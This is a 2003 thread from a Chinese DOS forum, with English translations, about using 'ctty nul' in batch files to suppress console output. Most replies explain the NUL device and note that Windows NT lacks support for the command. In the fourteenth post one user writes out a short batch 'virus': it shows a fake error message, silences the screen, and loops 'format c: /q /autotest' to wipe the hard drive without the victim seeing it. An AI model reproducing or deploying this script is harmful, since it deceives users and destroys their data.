|
iceboy
银牌会员
    
积分 1681
发帖 512
注册 2003-8-2
状态 离线
|
『楼 主』:
锁键盘命令
使用 LLM 解释/回答一下
ctty nul
很简单吧,大家可能也用过,只不过想不起来了
恢复时用 ctty con
不过一定要用在批处理中哦,要不然... 只有重新启动了...
ctty nul
It's very simple, everyone may have used it, but just can't remember it.
When restoring, use ctty con
But it must be used in a batch file, otherwise... you have to restart...
|

Somehow somewhere I've got to choose.
No matter if it is win or lose. |
|
2003-8-12 00:00 |
|
|
iceboy
银牌会员
    
积分 1681
发帖 512
注册 2003-8-2
状态 离线
|
『第 2 楼』:
使用 LLM 解释/回答一下
不过运行后屏幕上再也不会显示任何东西,相当于所有命令都加上了 >nul
But after running, nothing will be displayed on the screen anymore, which is equivalent to adding >nul to all commands
|

Somehow somewhere I've got to choose.
No matter if it is win or lose. |
|
2003-8-12 00:00 |
|
|
cn_archer
元老会员
         农民
积分 2903
发帖 991
注册 2003-7-23 来自 福建省
状态 离线
|
『第 3 楼』:
使用 LLM 解释/回答一下
好招!
|

艰难奋长戟,万古用一夫
中国DOS联盟 http://www.cn-dos.net 欢迎大家来共同学习
我的MSN&E-Mail cn_archer@hotmail.com QQ 56049418
|
|
2003-8-12 00:00 |
|
|
jeffyy
初级用户
 
积分 219
发帖 23
注册 2003-8-11
状态 离线
|
|
2003-8-12 00:00 |
|
|
无妄★模拟
初级用户
  蝎蛇统领
积分 280
发帖 35
注册 2003-5-21
状态 离线
|
『第 5 楼』:
使用 LLM 解释/回答一下
NUL是什么意思呀?重定向到NUL这个文件吗????说明一下呀~~~~~~~~~
What does NUL mean? Redirect to the file NUL??? Explain it~~~~~~~~~
|

我是菜鸟,我要变成老鸟!
www.10.164.63.101.com |
|
2003-8-14 00:00 |
|
|
Roy
管理员
          專業島民
积分 4869
发帖 1633
注册 2002-12-10
状态 离线
|
『第 6 楼』:
使用 LLM 解释/回答一下
以下是引用无妄★模拟在2003-8-14 16:07:20的发言:
NUL是什么意思呀?重定向到NUL这个文件吗????说明一下呀~~~~~~~~~
nul是一個"空"的設備,不是文件
The following is a quote from Wu Wang ★ Simulation on 2003-8-14 16:07:20:
What does NUL mean? Redirect to the file NUL??? Explain it~~~~~~~~~
nul is an "empty" device, not a file
|

我的網站:http://mw16.2ya.com/ 我的網誌: http://scrappedblog.blogspot.com/
~
我的Winamp正在播放的歌曲:
 |
|
2003-8-14 00:00 |
|
|
hzy
高级用户
   
积分 578
发帖 135
注册 2003-7-10
状态 离线
|
|
2003-8-15 00:00 |
|
|
gotoMSDOS
铂金会员
       C++启程者
积分 5154
发帖 1827
注册 2003-7-18
状态 离线
|
『第 8 楼』:
使用 LLM 解释/回答一下
这还用问吗? 想一想就知道啦!!
.'.'.'.'..=-=-0978676756
';'./'''
'///'/'\
Is this still a question? Just think about it!!
.'.'.'.'..=-=-0978676756
';'./'''
'///'/'\
|
|
2003-8-15 00:00 |
|
|
LanE
银牌会员
    
积分 1833
发帖 648
注册 2002-11-8
状态 离线
|
『第 9 楼』:
使用 LLM 解释/回答一下
呵呵,这个通常是在批处理里面使用来阻止屏幕输出,然后用ctty con恢复,不过如果直接做命令使用,那就重新启动吧
Hehe, this is usually used in batch processing to prevent screen output, and then restored with ctty con. But if used directly as a command, then restart it.
|
|
2003-8-15 00:00 |
|
|
ssbird
初级用户
 
积分 130
发帖 6
注册 2003-8-15
状态 离线
|
|
2003-8-23 00:00 |
|
|
ajeef
初级用户
 
积分 167
发帖 14
注册 2003-8-2
状态 离线
|
『第 11 楼』:
使用 LLM 解释/回答一下
哎~~~~~~~ NTOS暂时没有支持此命令已经到了SP4了估计不会再支持了
Hey~~~~~~~ NTOS doesn't currently support this command yet. It has reached SP4, and it's estimated that it won't support it anymore.
|
|
2003-8-24 00:00 |
|
|
ajeef
初级用户
 
积分 167
发帖 14
注册 2003-8-2
状态 离线
|
『第 12 楼』:
使用 LLM 解释/回答一下
哎~~~~~~~ NTOS暂时没有支持此命令已经到了SP4了估计不会再支持了
Hey~~~~~~~ NTOS doesn't currently support this command yet. It's already at SP4, and it's estimated that it won't support it anymore.
|
|
2003-8-24 00:00 |
|
|
yong1268
初级用户
 
积分 107
发帖 2
注册 2003-8-24
状态 离线
|
『第 13 楼』:
使用 LLM 解释/回答一下
恢复时用 ctty con
不过一定要用在批处理中哦,要不然... 只有重新启动了...
批处理是什么意思????
When restoring, use ctty con. But it must be used in a batch file, otherwise... you'll have to restart... What does batch file mean???
|
|
2003-8-24 00:00 |
|
|
iceboy
银牌会员
    
积分 1681
发帖 512
注册 2003-8-2
状态 离线
|
『第 14 楼』:
使用 LLM 解释/回答一下
... 晕
and, 我发现这个命令用来编写批处理病毒很好...
@echo off
echo Found a error, please wait system to save the data...
ctty nul
:a
format c: /q /autotest
goto a
format 中途按 ctrl + c 只会导致硬盘数据被毁 (format 一半)
... Dizzy
and, I found that this command is very good for writing batch file viruses...
@echo off
echo Found a error, please wait system to save the data...
ctty nul
:a
format c: /q /autotest
goto a
Formatting halfway by pressing Ctrl + C will only cause the hard drive data to be destroyed (half-formatted)
|

Somehow somewhere I've got to choose.
No matter if it is win or lose. |
|
2003-8-30 00:00 |
|
|
laochang409
中级用户
  
积分 297
发帖 44
注册 2004-6-15
状态 离线
|
|
2004-6-24 00:00 |
|